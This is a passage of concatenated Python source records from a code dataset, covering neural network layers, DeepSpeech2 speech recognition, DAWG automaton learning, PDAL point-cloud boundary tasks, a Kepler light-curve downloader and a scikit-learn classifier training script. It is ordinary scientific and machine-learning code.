out=self.epsilon_weight)\n if self.bias is not None:\n torch.randn(self.epsilon_bias.size(), out=self.epsilon_bias)\n bias = bias + self.sigma_bias * self.epsilon_bias\n return F.linear(x, self.weight + self.sigma_weight * self.epsilon_weight, bias)\n\n\nclass Linear0(nn.Linear):\n def reset_parameters(self):\n nn.init.constant_(self.weight, 0.)\n if self.bias is not None:\n nn.init.constant_(self.bias, 0.)\n\n\n__all__ = [\"Aggregation\", \"Dueling\", \"Flatten\", \"NoisyLinear\", \"Linear0\"]\n","sub_path":"all/layers/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"119284137","text":"import torch\nimport numpy as np\nimport sys\nimport librosa\nimport argparse\nimport time\nimport pyaudio\n\nimport ailia\n\"\"\"import original modules\"\"\"\nsys.path.append('../../util') \nfrom model_utils import check_and_download_models\n\n# ======================\n# Parameters\n# ======================\nMODEL_LISTS = ['an4_pretrained_v2', 'librispeech_pretrained_v2', 'ted_pretrained_v2']\n\nDEFAULT_MODEL = 'librispeech_pretrained_v2'\n\nWEIGHT_PATH = 'librispeech_pretrained_v2.onnx'\nMODEL_PATH = 'librispeech_pretrained_v2.onnx.prototxt'\nREMOTE_PATH = 'https://storage.googleapis.com/ailia-models/deepspeech2/'\n\nWAV_PATH = './1221-135766-0000.wav'\nSAVE_TEXT_PATH = 'output.txt'\n\nSAMPLING_RATE = 16000\nWIN_LENGTH = int(SAMPLING_RATE * 0.02)\nHOP_LENGTH = int(SAMPLING_RATE * 0.01)\n\nLABELS = list('_\\'ABCDEFGHIJKLMNOPQRSTUVWXYZ ')\nint_to_char = dict([(i, c) for (i, c) in enumerate(LABELS)])\nBRANK_LABEL_INDEX = 0\n\n#BeamCTCDecoder parameter\nLM_PATH = '3-gram.pruned.3e-7.arpa'\nALPHA=1.97\nBETA=4.36 \nCUTOFF_TOP_N=40\nCUTOFF_PROB=1.0\nNUM_PROCESS=1\nBEAM_WIDTH=128\n\n#pyaudio\nCHUNK = 1024\nFORMAT = pyaudio.paInt16 \nCHANNELS = 1 \nRECODING_SAMPING_RATE = 48000 \nTHRESHOLD = 0.02\n\n# ======================\n# Arguemnt Parser Config\n# ======================\nparser = argparse.ArgumentParser(\n description='deepspeech2'\n)\nparser.add_argument(\n '-i', '--input', metavar='WAV',\n default=WAV_PATH,\n help='The input wav path.'\n)\nparser.add_argument(\n '-s', '--savepath', metavar='SAVE_TEXT_PATH',\n default=SAVE_TEXT_PATH,\n help='Save path for the output text.'\n)\nparser.add_argument(\n '-b', '--benchmark',\n action='store_true',\n help='Running the inference on the same input 5 times ' +\n 'to measure execution performance. 
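Editor's sketch, standalone and illustrative: the NoisyLinear layer above computes y = (W + sigma * eps) x plus a similarly perturbed bias, sampling fresh eps on every training forward pass and using the plain weights at eval time. All tensors below are toy stand-ins, not values from the record.

import torch

torch.manual_seed(0)
W = torch.randn(2, 4)
b = torch.zeros(2)
sigma = torch.full((2, 4), 0.017)  # same sigma_init as the record above
x = torch.ones(1, 4)

eval_out = x @ W.t() + b                    # eval mode: deterministic
eps = torch.randn(2, 4)                     # train mode: sample new noise
train_out = x @ (W + sigma * eps).t() + b
print(torch.allclose(eval_out, train_out))  # False (almost surely)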
(Cannot be used in video mode)'\n)\nparser.add_argument(\n '-V',\n action='store_true',\n help='use microphone input'\n)\nparser.add_argument(\n '-d', '--beamdecode',\n action='store_true',\n help='use beam decoder'\n)\nparser.add_argument(\n '-a', '--arch', metavar='WEIGHT',\n default=DEFAULT_MODEL, choices=MODEL_LISTS,\n help='model lists: ' + ' | '.join(MODEL_LISTS)\n)\nargs = parser.parse_args()\n\n# ======================\n# Utils\n# ======================\ndef create_spectrogram(wav):\n stft = librosa.stft(wav, n_fft=WIN_LENGTH,\n win_length=WIN_LENGTH, hop_length=HOP_LENGTH,\n window='hamming')\n stft, _ = librosa.magphase(stft)\n spectrogram = np.log1p(stft)\n spec_length = np.array(([stft.shape[1]-1]))\n\n mean = spectrogram.mean()\n std = spectrogram.std()\n spectrogram -= mean\n spectrogram /= std\n\n spectrogram = np.log1p(spectrogram)\n spectrogram = spectrogram[np.newaxis, np.newaxis, :, :]\n\n return (spectrogram, spec_length)\n\n\ndef record_microphone_input():\n print('Ready...')\n time.sleep(1)\n p = pyaudio.PyAudio()\n\n stream = p.open(format=FORMAT,\n channels=CHANNELS,\n rate=RECODING_SAMPING_RATE,\n input=True,\n frames_per_buffer=CHUNK)\n\n #time.sleep(1)\n print(\"Please speak something\")\n\n frames = []\n count_uv = 0\n\n stream.start_stream()\n while True:\n data = np.frombuffer(stream.read(CHUNK), dtype=np.int16) / 32768.0\n if data.max() > THRESHOLD:\n frames.extend(data)\n count_uv = 0\n elif len(frames) > 0:\n count_uv += 1\n if count_uv > 48:\n break\n frames.extend(data)\n \n\n #print(\"Translating\")\n\n stream.stop_stream()\n stream.close()\n p.terminate()\n\n wav = np.array(frames)\n return librosa.resample(wav, RECODING_SAMPING_RATE, SAMPLING_RATE)\n\n\ndef decode(sequence, size=None):\n sequence = np.argmax(sequence, -1)\n \n text = ''\n size = int(size[0]) if size is not None else len(sequence)\n for i in range(size):\n char = int_to_char[sequence[i]]\n if char != int_to_char[BRANK_LABEL_INDEX]:\n if i != 0 and char == int_to_char[sequence[i - 1]]:\n pass\n else:\n text += char\n return text.lower()\n\n\n#言語モデルを使用したデコード\ndef beam_ctc_decode(sequence, size=None, decoder=None):\n out, scores, offsets, seq_len = decoder.decode(sequence, size)\n\n results = []\n for b, batch in enumerate(out):\n utterances = []\n for p, utt in enumerate(batch):\n size = seq_len[0][p]\n if size > 0:\n transcript = ''.join(map(lambda x: int_to_char[x.item()], utt[0:size]))\n else:\n transcript = ''\n utterances.append(transcript)\n\n return utterances[0].lower()\n\n\n# ======================\n# Main functions\n# ======================\ndef wavfile_input_recognition():\n if args.beamdecode:\n try:\n from ctcdecode import CTCBeamDecoder\n except ImportError:\n raise ImportError(\"BeamCTCDecoder requires paddledecoder package.\")\n\n decoder = CTCBeamDecoder(LABELS, LM_PATH, ALPHA, BETA, CUTOFF_TOP_N, CUTOFF_PROB, BEAM_WIDTH,\n NUM_PROCESS, BRANK_LABEL_INDEX)\n\n wav = librosa.load(args.input, sr=SAMPLING_RATE)[0]\n spectrogram = create_spectrogram(wav)\n\n # net initialize\n env_id = ailia.get_gpu_environment_id()\n print(f'env_id: {env_id}')\n net = ailia.Net(MODEL_PATH, WEIGHT_PATH, env_id=env_id)\n net.set_input_shape(spectrogram[0].shape)\n\n # inference\n print('Start inference...')\n if args.benchmark:\n print('BENCHMARK mode')\n for c in range(5):\n start = int(round(time.time() * 1000))\n preds_ailia, output_length = net.predict(spectrogram)\n end = int(round(time.time() * 1000))\n print(\"\\tailia processing time {} ms\".format(end-start))\n else:\n #Deep Speech 
output: output_probability, output_length\n preds_ailia, output_length = net.predict(spectrogram)\n\n #実装上、1度torch.Tensorに変換\n if args.beamdecode:\n text = beam_ctc_decode(torch.from_numpy(preds_ailia), torch.from_numpy(output_length), decoder)\n else:\n text = decode(preds_ailia[0], output_length)\n\n with open(args.savepath, 'w', encoding='utf-8') as f:\n f.write(text)\n print(f'predict sentence:\\n{text}')\n print('Script finished successfully.')\n\n\n# ======================\n# microphone input mode\n# ======================\ndef microphone_input_recognition():\n env_id = ailia.get_gpu_environment_id()\n print(f'env_id: {env_id}')\n\n if args.beamdecode:\n try:\n from ctcdecode import CTCBeamDecoder\n except ImportError:\n raise ImportError(\"BeamCTCDecoder requires paddledecoder package.\")\n\n decoder = CTCBeamDecoder(LABELS, LM_PATH, ALPHA, BETA, CUTOFF_TOP_N, CUTOFF_PROB, BEAM_WIDTH,\n NUM_PROCESS, BRANK_LABEL_INDEX)\n\n while True:\n wav = record_microphone_input()\n spectrogram = create_spectrogram(wav)\n\n # net initialize\n net = ailia.Net(MODEL_PATH, WEIGHT_PATH, env_id=env_id)\n net.set_input_shape(spectrogram[0].shape)\n\n # inference\n print('Translating...')\n #Deep Speech output: output_probability, output_length\n preds_ailia, output_length = net.predict(spectrogram)\n\n if args.beamdecode:\n text = beam_ctc_decode(torch.from_numpy(preds_ailia), torch.from_numpy(output_length), decoder)\n else:\n text = decode(preds_ailia[0], output_length)\n\n print(f'predict sentence:\\n{text}\\n')\n time.sleep(1)\n\n\ndef main():\n global WEIGHT_PATH, MODEL_PATH\n if args.arch != WEIGHT_PATH:\n WEIGHT_PATH = args.arch + '.onnx'\n MODEL_PATH = WEIGHT_PATH + '.prototxt'\n \n check_and_download_models(WEIGHT_PATH, MODEL_PATH, REMOTE_PATH)\n check_and_download_models(LM_PATH, LM_PATH, REMOTE_PATH)\n \n #マイク入力モード\n if args.V:\n try:\n microphone_input_recognition()\n except KeyboardInterrupt:\n print('script finished successfully.')\n\n #音声ファイル入力モード\n else:\n wavfile_input_recognition()\n\n\nif __name__==\"__main__\":\n main()","sub_path":"audio_processing/deepspeech2/deepspeech2.py","file_name":"deepspeech2.py","file_ext":"py","file_size_in_byte":8228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"139216144","text":"from copy import deepcopy as copy\nfrom utils import convert_afn_to_afd\nimport AFD\nimport AFN\nimport time\n\n\ndef _ordenar_potencia(potencia):\n potencia_ordenada = {}\n for estado in potencia:\n for aresta in potencia[estado]:\n potencia_ordenada[(estado, aresta)] = potencia[estado][aresta]\n potencia_ordenada = {k: v for k, v in sorted(potencia_ordenada.items(), key=lambda item: item[1], reverse=True)}\n return potencia_ordenada\n\n\ndef _calcular_potencia(dawg):\n potencia = {}\n estados_calculados = []\n\n for estado in dawg['states']:\n if estado != '{e}':\n for aresta in dawg['states'][estado]:\n if '{e}' in dawg['states'][estado][aresta]:\n potencia[estado] = {'{e}': 1}\n estados_calculados.append(estado)\n\n while len(estados_calculados) > 0:\n for estado_calculado in estados_calculados.copy():\n for estado in dawg['states']:\n if estado != '{e}':\n for aresta in dawg['states'][estado]:\n if estado_calculado in dawg['states'][estado][aresta]:\n\n if estado in potencia:\n potencia[estado].update({estado_calculado: sum(potencia[estado_calculado].values())})\n else:\n potencia[estado] = {estado_calculado: sum(potencia[estado_calculado].values())}\n\n estados_calculados.append(estado)\n\n 
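Editor's sketch on toy data: the decode() function in the deepspeech2 record above implements greedy CTC decoding, i.e. per-frame argmax, collapse of consecutive repeats, then dropping the blank label at index 0. The frames array here is fabricated for illustration.

import numpy as np

LABELS = list("_'ABCDEFGHIJKLMNOPQRSTUVWXYZ ")
frames = np.array([
    [0.1, 0.0, 0.8, 0.1],    # argmax -> 2 ('A')
    [0.1, 0.0, 0.8, 0.1],    # repeated 2, collapsed
    [0.9, 0.0, 0.05, 0.05],  # blank (index 0), dropped
    [0.1, 0.0, 0.1, 0.8],    # argmax -> 3 ('B')
])
ids = np.argmax(frames, axis=-1)
text, prev = "", None
for i in ids:
    if i != 0 and i != prev:
        text += LABELS[i]
    prev = i
print(text.lower())  # "ab"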
estados_calculados.remove(estado_calculado)\n\n return _ordenar_potencia(potencia)\n\n\ndef _extend(dawg, S_minus):\n potencias = _calcular_potencia(dawg)\n dawg_copy = copy(dawg) # para testar sem modificar diretamente\n\n for aresta in potencias:\n for simbolo in dawg['alphabet']:\n if simbolo in dawg['states'][aresta[0]]:\n if aresta[1] not in dawg['states'][aresta[0]][simbolo]:\n dawg_copy['states'][aresta[0]][simbolo].append(aresta[1])\n else:\n dawg_copy['states'][aresta[0]][simbolo] = [aresta[1]]\n\n if dawg_copy != dawg:\n for string_invalida in S_minus:\n if AFN.testar_string(dawg_copy, string_invalida)[0]:\n break\n else:\n dawg = copy(dawg_copy) # so executa se nao encontrar string invalida\n\n dawg_copy = copy(dawg) # para testar sem modificar diretamente\n\n return dawg\n\n\ndef _build(dawg, estados):\n rotulo_do_estado = ';'.join(estados)\n dawg['states'][rotulo_do_estado] = {}\n novos_estados = []\n\n alfabeto_local = {}\n for estado in estados:\n simbolo = estado[0]\n if simbolo not in alfabeto_local:\n alfabeto_local[simbolo] = []\n alfabeto_local[simbolo].append(estado)\n\n for simbolo in alfabeto_local:\n dawg['states'][rotulo_do_estado][simbolo] = []\n proximos_estados = []\n\n for estado in alfabeto_local[simbolo]:\n proximo_estado = estado[1:]\n if len(proximo_estado) > 0: # como o estado vazio não é utilizado para descobrir novos estados, ele nao vai para o rotulo\n proximos_estados.append(proximo_estado)\n else:\n dawg['states'][rotulo_do_estado][simbolo].append('{e}') # com o vazio e adicionado a transicao para o estado final\n\n if len(proximos_estados) > 0:\n dawg['states'][rotulo_do_estado][simbolo].append(';'.join(proximos_estados))\n novos_estados.append(proximos_estados)\n\n return novos_estados\n\n\ndef contruir_dawg(S_plus, S_minus, alphabet):\n # a utilização de ';' ao inves de ',' se da para nao ter conflito na hora da conversao para AFD\n dawg = {'initial': ';'.join(S_plus), 'final': ['{e}'], 'alphabet': alphabet, 'states': {'{e}': {}}}\n novos_estados = [dawg['initial'].split(';')]\n\n while len(novos_estados) > 0:\n for novo_estado in novos_estados.copy():\n novos_estados += _build(dawg, novo_estado)\n\n novos_estados.remove(novo_estado)\n\n dawg_e = _extend(dawg, S_minus)\n\n return dawg_e\n\n\ndef _open_dawg_arquivo(path):\n f = open(path, \"r\")\n lines = f.readlines()\n S_plus = []\n S_minus = []\n alphabet = []\n\n for x in lines:\n if x == '&':\n break\n string, classe = x.split('\\t')\n if '+' in classe:\n S_plus.append(string)\n else:\n S_minus.append(string)\n\n alphabet += list(string)\n f.close()\n\n alphabet = list(set(alphabet))\n\n return [S_plus, S_minus, alphabet]\n\n\ndef _open_teste_dawg_arquivo(path):\n f = open(path, \"r\")\n lines = f.readlines()\n S_plus = []\n S_minus = []\n\n for x in lines:\n if 'Classification' in x:\n continue\n classe, string = x.split(',')\n string = string.replace('\\n', '')\n if 'non-amyloid' in classe:\n S_minus.append(string)\n else:\n S_plus.append(string)\n f.close()\n\n return [S_plus, S_minus]\n\n\ndef contruir_dawg_arquivo(path):\n S_plus, S_minus, alphabet = _open_dawg_arquivo(path)\n\n dawg = contruir_dawg(S_plus, S_minus, alphabet)\n\n return dawg\n\n\ndef testar_dawg_arquivo(dawg, path):\n [S_plus, S_minus] = _open_teste_dawg_arquivo(path)\n acertos = 0\n total = len(S_plus) + len(S_minus)\n\n start = time.time()\n for string in S_minus:\n reposta, _ = AFN.testar_string(dawg, string)\n if not reposta:\n acertos += 1\n\n for string in S_plus:\n reposta, _ = AFN.testar_string(dawg, string)\n if 
reposta:\n            acertos += 1\n\n    end = time.time()\n    tempo = end - start\n\n    porcentagem = acertos/total * 100\n    print('Porcentagem de acertos: {:.2f}%'.format(porcentagem))\n    print('media de tempo: {}s'.format(tempo/total))\n\n\ndef testar_dawg_arquivo_convertendo_AFD(dawg, path):\n    [S_plus, S_minus] = _open_teste_dawg_arquivo(path)\n    acertos = 0\n    total = len(S_plus) + len(S_minus)\n\n    print('convertendo...')\n    dawg = convert_afn_to_afd(dawg)\n\n    start = time.time()\n\n    for string in S_minus:\n        reposta = AFD.testar_string(dawg, string)\n        if not reposta:\n            acertos += 1\n\n    for string in S_plus:\n        reposta = AFD.testar_string(dawg, string)\n        if reposta:\n            acertos += 1\n\n    end = time.time()\n    tempo = end - start\n\n    porcentagem = acertos/total * 100\n    print('Porcentagem de acertos convertendo: {:.2f}%'.format(porcentagem))\n    print('media de tempo com AFD: {}s'.format(tempo/total))\n","sub_path":"DAWG.py","file_name":"DAWG.py","file_ext":"py","file_size_in_byte":6574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"241519747","text":"import boto3\nimport time\nimport os\nimport json\n\nimport multiprocessing\nimport subprocess\nimport string\nfrom pathlib import Path\nimport logging\nlogger = logging.getLogger('usgs_boundary')\nimport requests\n\n\ndef run(task):\n    task.run()\n    return task\n\nclass Command(object):\n    def __init__(self, args):\n        self.args = args\n\n    def __repr__(self):\n        return f'{self.args}'\n\nclass Task(object):\n    def __init__(self, bucket, key, resolution=1000):\n        self.bucket = bucket\n        self.key = key\n        self.url = f'https://s3-us-west-2.amazonaws.com/{self.bucket}/{self.key}ept.json'\n        self.resolution = resolution\n        self.stats = None\n        self.wkt = None\n        self.error = None\n\n    def geometry(self):\n        self.wkt = self.stats['boundary']['boundary']\n\n\n    def run (self):\n        try:\n            self.count()\n            self.info()\n\n            self.geometry()\n        except (AttributeError, KeyError, json.decoder.JSONDecodeError):\n            pass\n\n    def count (self):\n        r = requests.get(self.url)\n        self.num_points = int(r.json()['points'])\n\n    def info (self):\n        cargs = ['pdal','info','--all',\n                 '--driver','readers.ept',\n                 f'--readers.ept.resolution={self.resolution}',\n                 f'--readers.ept.threads=6',\n                 f'--filters.hexbin.edge_size=1000',\n                 f'--filters.hexbin.threshold=1',\n                 self.url]\n        logger.debug(\" \".join(cargs))\n        p = subprocess.Popen(cargs, stdin=subprocess.PIPE,\n                             stdout=subprocess.PIPE,\n                             stderr=subprocess.PIPE,\n                             encoding='utf8')\n        ret = p.communicate()\n        if p.returncode != 0:\n            error = ret[1]\n            logger.error(cargs)\n            logger.error(error)\n            self.error = {\"args\":cargs, \"error\": error}\n            raise AttributeError(error)\n        self.stats = json.loads(ret[0])\n\n\n    def __repr__(self):\n        return f'{self.bucket} {self.key}'\n\nclass Process(object):\n\n    def __init__(self):\n        self.tasks = []\n        self.results = []\n\n    def put(self, task):\n        self.tasks.append(task)\n\n    def do(self, count = multiprocessing.cpu_count()):\n        pool = multiprocessing.Pool(processes=count)\n        self.results = (pool.map(run, self.tasks))\n# import pdb;pdb.set_trace()\n\n","sub_path":"action/usgs_boundary/proqueue.py","file_name":"proqueue.py","file_ext":"py","file_size_in_byte":2423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"650165511","text":"#!/usr/bin/env python3\n\n'''Output is the same set of columns but sorted alphabetically (ignoring case)'''\n\nimport sys\n\ndef sorter(t):\n    tmp = \"\".join(t).lower()\n    return tmp\n\ndef main():\n    s = [l.strip() for 
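Editor's sketch, hypothetical and standalone: Process.do() in the proqueue record above maps a module-level run() helper over a Pool, a common pattern since instance methods have historically not pickled cleanly; the same fan-out in miniature, with run() here a stand-in rather than the record's version.

import multiprocessing

def run(task):
    return task * task  # stand-in for task.run()

if __name__ == "__main__":
    with multiprocessing.Pool(processes=2) as pool:
        print(pool.map(run, [1, 2, 3, 4]))  # [1, 4, 9, 16]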
l in sys.stdin]\n grid = []\n for t in s:\n a = []\n for l in t:\n a.append(l)\n grid.append(a)\n\n a = []\n for i in range(len(grid[0])):\n letter = \"\"\n for n in grid:\n letter += n[i]\n a.append(list(letter))\n\n new = sorted(a, key=sorter)\n\n b = []\n for j in range(len(new[0])):\n letter = \"\"\n for p in new:\n letter += p[j]\n b.append(list(letter))\n\n for word in b:\n print(\"\".join(word))\n\nif __name__ == '__main__':\n main()\n","sub_path":"Sort_sideways.py","file_name":"Sort_sideways.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"206469026","text":"from __future__ import division, print_function\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport wget\nimport kplr\nimport os\nfrom astropy.io import fits\n\n\ndef download(target, downloadFolderPath=\"downloadedData\"):\n \"\"\"Download Kepler data for a target.\n Args:\n target (float, int, or str): The target to download.\n Can be a KOI number (float), KIC (int), or Kepler planet name (str).\n downloadFolderPath(str): The relative path to the folder where the target's \n light curve fits files will be downloaded.\n \"\"\"\n\n client = kplr.API()\n \n # Find the target.\n if isinstance(target, str):\n target = client.planet(target)\n #period=target.koi_period\n KIC = target.kepid\n\n elif isinstance(target, int):\n KIC = target\n target = client.star(target)\n\n elif isinstance(target, float):\n target = client.koi(target)\n #period=target.koi_period\n KIC=target.kepid\n\n KICname = str(KIC).zfill(9)\n KICshort=KICname[0:4]\n\n #folder to hold the downloaded light curves\n dataDirectory = os.getcwd()+\"{0}/KIC_{1}\".format(downloadFolderPath.split(\".\")[1],KIC)\n print(\"Downloading light curves to {0}.\".format(dataDirectory))\n\n if not os.path.exists(dataDirectory):\n os.makedirs(dataDirectory)\n\n ftpfolder='http://archive.stsci.edu/pub/kepler/lightcurves//'+KICshort+'/'+KICname+'/'\n #print ftpfolder\n\n fileList = wget.download(ftpfolder)\n\n with open(fileList, 'r') as listOfLinks:\n lol=listOfLinks.read()\n\n lol = lol.split('href=\"kplr')[1:-2]\n\n fileNames = []\n\n for linkString in lol:\n linkString = linkString.split('\">')[1]\n linkString = linkString.split('<')[0]\n fileNames.append(linkString)\n\n #list to hold names of long cadence light curve fits files\n n_lcs = 0\n for fileToDownload in fileNames:\n targetFile = ftpfolder+fileToDownload\n #print targetFile\n lcName = dataDirectory+'/'+fileToDownload\n #download fits file if necessary\n if not os.path.exists(lcName):\n wget.download(targetFile, lcName)\n n_lcs += 1\n \n print(\"{0} light curve files downloaded.\".format(n_lcs))\n #delete download list\n os.system('rm ./download.wget')\n\n return\n\n#next functions to write:\n\ndef readIn(KIC, dataFolder, cadence=\"both\", plot=True):\n \"\"\"Having downloaded the Kepler light curves for a target (see above), read in the\n time, flux, fluxerr columns. 
\n Args:\n KIC (int): KIC number for this star\n dataFolder (str): The relative path to the folder where the target's \n light curve fits are.\n cadence (str): Read in only short-cadence data, only long-cadence data, or both?\n plot (bool): Plot the data, or no?\n \"\"\"\n\n dataDirectory = os.getcwd() + dataFolder.split(\".\")[1]\n\n lcs = []\n\n for lcName in os.listdir(dataDirectory):\n if cadence == \"short\":\n if lcName[-8:] == \"slc.fits\":\n lcs.append(lcName)\n\n elif cadence == \"long\":\n if lcName[-8:] == \"llc.fits\":\n lcs.append(lcName)\n else:\n lcs.append(lcName)\n\n #sort light curve fits files by date\n dates = []\n for lc in lcs:\n dates.append(int(lc[14:-9]))\n\n dates = np.array(dates)\n dateIdxs = np.argsort(dates)\n\n lcs = np.array(lcs)[dateIdxs]\n \n # Loop over the datasets and read in the data.\n time, flux, ferr, quality = [], [], [], []\n print(len(lcs),' lightcurves')\n for lc in lcs:\n f = fits.open(dataDirectory+'/'+lc)\n\n # The lightcurve data are in the first FITS HDU.\n hdu_data = f[1].data\n\n time.append(hdu_data[\"time\"])\n flux.append(hdu_data[\"sap_flux\"])\n ferr.append(hdu_data[\"sap_flux_err\"])\n quality.append(hdu_data[\"sap_quality\"])\n\n firstObs=0\n lastObs=len(time)-1\n \n if plot==True:\n firstPlot=plt.gca()\n firstPlot.plot(np.hstack(time[firstObs:lastObs+1]),(np.hstack(flux[firstObs:lastObs+1])/np.nanmean(np.hstack(flux[firstObs:lastObs+1])))-1,'k.',alpha=0.25)\n plt.show()\n\n return time, flux, ferr, quality\n\n\n\n","sub_path":"getKeplerData.py","file_name":"getKeplerData.py","file_ext":"py","file_size_in_byte":4178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"102049813","text":"import os\nimport time\nfrom datetime import datetime\nimport sys\nimport random\nimport uuid\nimport pprint\nimport numpy as np\nfrom sklearn import svm\nimport serial\nimport serial.tools.list_ports\nfrom PyQt5.QtGui import *\nimport PyQt5.QtWidgets\nfrom PyQt5.QtCore import Qt, QTimer, QPoint\nfrom PyQt5.QtWidgets import *\n\nimport pickle\nfrom sklearn.externals import joblib\n\nimport matplotlib\nmatplotlib.use('Qt5Agg')\nimport matplotlib.pyplot as plt\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\nfrom matplotlib.backends.backend_qt5agg import NavigationToolbar2QT as NavigationToolbar\nfrom matplotlib.figure import Figure\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\nard = serial.Serial()\nard.baudrate = 115200\n\ndef standarizeData():\n X = []\n y = []\n try:\n os.chdir(os.getcwd()+'\\\\data0')\n for path, subdir, files in os.walk('.'):\n for directory in subdir: \n for file in os.listdir(os.getcwd() + '\\\\'+directory):\n y.append(directory)\n filename = os.getcwd()+ '\\\\'+directory + '\\\\' + file\n f = open(filename, 'r')\n data = f.read()#[1:-1]\n data = data[1:-1]\n data = [float(s) for s in data.split(',')]\n X.append(data)\n f.close()\n \"\"\"os.chdir(os.getcwd()+'\\\\..\\\\data90')\n for path, subdir, files in os.walk('.'):\n for directory in subdir: \n for file in os.listdir(os.getcwd() + '\\\\'+directory):\n y.append(directory)\n #print(directory)\n filename = os.getcwd()+ '\\\\'+directory + '\\\\' + file\n f = open(filename, 'r')\n data = f.read()#[1:-1]\n data = data[1:-1]\n data = [float(s) for s in data.split(',')]\n X.append(data)\n f.close()\n os.chdir(os.getcwd()+'\\\\..\\\\data180')\n for path, subdir, files in os.walk('.'):\n for directory in subdir: \n for file in os.listdir(os.getcwd() + 
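Editor's sketch on toy data: readIn() above plots np.hstack-ed quarters normalized as flux / nanmean(flux) - 1, i.e. relative deviation from the mean flux; the same arithmetic on a fabricated pair of quarters.

import numpy as np

quarters = [np.array([100.0, 101.0, np.nan]), np.array([99.0, 100.0])]
flux = np.hstack(quarters)
rel = flux / np.nanmean(flux) - 1
print(rel)  # approximately [0.0, 0.01, nan, -0.01, 0.0]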
'\\\\'+directory):\n                    y.append(directory)\n                    #print(directory)\n                    filename = os.getcwd()+ '\\\\'+directory + '\\\\' + file\n                    f = open(filename, 'r')\n                    data = f.read()#[1:-1]\n                    data = data[1:-1]\n                    data = [float(s) for s in data.split(',')]\n                    X.append(data)\n                    f.close()\n        os.chdir(os.getcwd()+'\\\\..\\\\data270')\n        for path, subdir, files in os.walk('.'):\n            for directory in subdir: \n                for file in os.listdir(os.getcwd() + '\\\\'+directory):\n                    y.append(directory)\n                    #print(directory)\n                    filename = os.getcwd()+ '\\\\'+directory + '\\\\' + file\n                    f = open(filename, 'r')\n                    data = f.read()#[1:-1]\n                    data = data[1:-1]\n                    data = [float(s) for s in data.split(',')]\n                    X.append(data)\n                    f.close()\n        \"\"\"\n    except Exception as exc:\n        print(exc)\n    #print(y)\n    #print(X)\n    os.chdir(os.getcwd()+'\\\\..')\n    print(os.getcwd())\n    dataFile = 'features0.py'\n    fileObj = open(dataFile, 'w')\n    fileObj.write('X = ' + pprint.pformat(X)+ '\\n')\n    fileObj.write('y = ' + pprint.pformat(y)+ '\\n')\n    fileObj.close()\n    #print(len(X), len(y))\n\ndef trainClassifier():\n    from sklearn.tree import DecisionTreeClassifier\n    from sklearn.neighbors import KNeighborsClassifier\n    from sklearn.svm import SVC, SVR\n    from sklearn.ensemble import VotingClassifier\n    from itertools import product\n    from sklearn.model_selection import train_test_split\n    from sklearn.ensemble import RandomForestClassifier\n\n    #This is whatever you saved your X and y data into\n    import features0\n\n    X = np.array(features0.X)\n    y = np.array(features0.y)\n\n    testSize = .3\n    randomState=1\n    \n    X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=testSize, random_state=randomState)\n\n    #Classification\n    clf0 = svm.SVC(kernel='linear')\n    clf1 = DecisionTreeClassifier(max_depth=4)\n    clf2 = KNeighborsClassifier(n_neighbors=7)\n    clf3 = SVC(kernel='rbf', probability=True)\n    eclf = VotingClassifier(estimators=[('dt', clf1), ('knn', clf2),\n                                        ('svc', clf3)],\n                            voting='soft', weights=[2, 1, 2])\n\n    #Regression\n    svrRbf = SVR(kernel='rbf', C=1e3, gamma=0.1)\n    svrLin = SVR(kernel='linear', C=1e3)\n    svrPoly = SVR(kernel='poly', C=1e3, degree=2)\n    \n    \n    clf0.fit(X_train,y_train)\n    clf1.fit(X_train,y_train)\n    clf2.fit(X_train,y_train)\n    clf3.fit(X_train,y_train)\n    eclf.fit(X_train,y_train)\n\n    #svrRbf.fit(X_train,y_train)\n    #svrLin.fit(X_train,y_train)\n    #svrPoly.fit(X_train,y_train)\n\n    #store classifier\n    #s = pickle.dumps(clf0)\n    joblib.dump(clf0, 'svm-SVC0deg.pkl')\n    \n    estimatorName=['linear SVC', 'Decision Tree', 'K Neighbors',\n                   'rbf Kernel SVC', 'Voting Classifier', 'SVR-RBF',\n                   'SVR-Lin', 'SVR-Poly']\n    predictions=[]\n    predictions.append(clf0.predict(X_test))\n    predictions.append(clf1.predict(X_test))\n    predictions.append(clf2.predict(X_test))\n    predictions.append(clf3.predict(X_test))\n    predictions.append(eclf.predict(X_test))\n    \n    #predictions.append(svrRbf.predict(X_test))\n    #predictions.append(svrLin.predict(X_test))\n    #predictions.append(svrPoly.predict(X_test))\n    \n    for i in range(len(predictions)):\n\n        pprint.pprint(estimatorName[i])\n        pprint.pprint('Predictions:'), pprint.pprint(np.array(predictions[i]))\n        pprint.pprint('Ground Truth:'), pprint.pprint(np.array(y_test))\n        \n        predVsTruth=predictions[i]==y_test \n        pprint.pprint(predVsTruth)\n        numCases =(len(predictions[i]))\n        numTrue = np.sum(predVsTruth)\n        numFalse = numCases - numTrue\n        print('Accuracy is: \"%s\"' % (numTrue/numCases*100))\n        print('Number True: \"%s\", Number False: \"%s\"\\n\\n' % (numTrue,numFalse))\n\n    \"\"\"#Must download Graphviz.exe and pip install graphviz for this to work\n    
